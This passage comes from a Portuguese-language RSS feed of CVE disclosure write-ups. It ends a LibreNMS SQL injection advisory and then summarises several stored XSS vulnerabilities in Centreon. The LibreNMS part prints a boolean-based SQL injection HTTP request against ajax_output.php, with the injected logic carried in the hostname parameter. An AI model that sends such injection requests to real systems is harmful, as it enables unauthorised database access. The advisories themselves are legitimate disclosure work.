&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: laravel_session=[ADMIN_SESSION_COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Observe que o sistema retorna os dados esperados e aciona o processo de descoberta.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65093/image.png&amp;#34;
	width=&amp;#34;1507&amp;#34;
	height=&amp;#34;666&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65093/image_hu_be0427b4a619e324.png 480w, /p/cve-2025-65093/image_hu_7986fb62e6a5776b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;226&amp;#34;
		data-flex-basis=&amp;#34;543px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Agora repita a solicitação com a condição &amp;lt;code&amp;gt;FALSE&amp;lt;/code&amp;gt;:&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;9
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;GET /ajax_output.php?id=capture&amp;amp;amp;format=text&amp;amp;amp;type=discovery&amp;amp;amp;hostname=10.0.5.4&amp;amp;#39;&#43;AND&#43;1=2&#43;AND&#43;&amp;amp;#39;1&amp;amp;#39;=&amp;amp;#39;1 HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: 10.0.5.5:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: */*
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://10.0.5.5:8000/device/3/capture
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: laravel_session=[SESSION COOKIE]
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Observe que a resposta foi alterada: nenhum dispositivo foi encontrado e nenhuma descoberta foi acionada.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-65093/image-1.png&amp;#34;
	width=&amp;#34;1496&amp;#34;
	height=&amp;#34;662&amp;#34;
	srcset=&amp;#34;/p/cve-2025-65093/image-1_hu_fd11cdac0c88dc23.png 480w, /p/cve-2025-65093/image-1_hu_88de69507b3ff869.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;225&amp;#34;
		data-flex-basis=&amp;#34;542px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;A diferença na saída confirma que a lógica booleana injetada está sendo executada pelo banco de dados.&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de banco de dados (esquemas, tabelas, usuários, versões).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/librenms/librenms/security/advisories/GHSA-6pmj-xjxp-p8g9&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 18 Nov 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54889</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54889/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54889/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54889-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54889: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do fabricante de traps SNMP.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração do fabricante de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54889-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54889: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54889&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do fabricante de traps SNMP.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração do fabricante de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54889-centreon-web-all-versions-medium-severity-5123&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54891</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54891/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54891/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54891-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54891: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de Acesso a Recursos do ACL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração de acesso a recursos do ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54891-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54891: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54891&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração de Acesso a Recursos do ACL.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade de Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração de acesso a recursos do ACL) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 14 Oct 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-54892</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-54892/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-54892/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-54892-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54892: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do grupo de traps SNMP.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração do grupo de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-54892-cross-site-scripting-xss-armazenado-em-centreon-infra-monitoring&amp;#34;&amp;gt;CVE-2025-54892: Cross-Site Scripting (XSS) Armazenado em Centreon Infra Monitoring
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-54892&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Um usuário com privilégios elevados pode injetar XSS na página de configuração do grupo de traps SNMP.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A vulnerabilidade Neutralização Indevida de Entrada Durante a Geração de Páginas Web (XSS ou &amp;#34;Cross-site Scripting&amp;#34;) no Centreon Infra Monitoring (módulos de configuração do grupo de traps SNMP) permite XSS Armazenado por usuários com privilégios elevados. Este problema afeta o Infra Monitoring: de 24.10.0 para 24.10.13, de 24.04.0 para 24.04.18, de 23.10.0 para 23.10.28.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
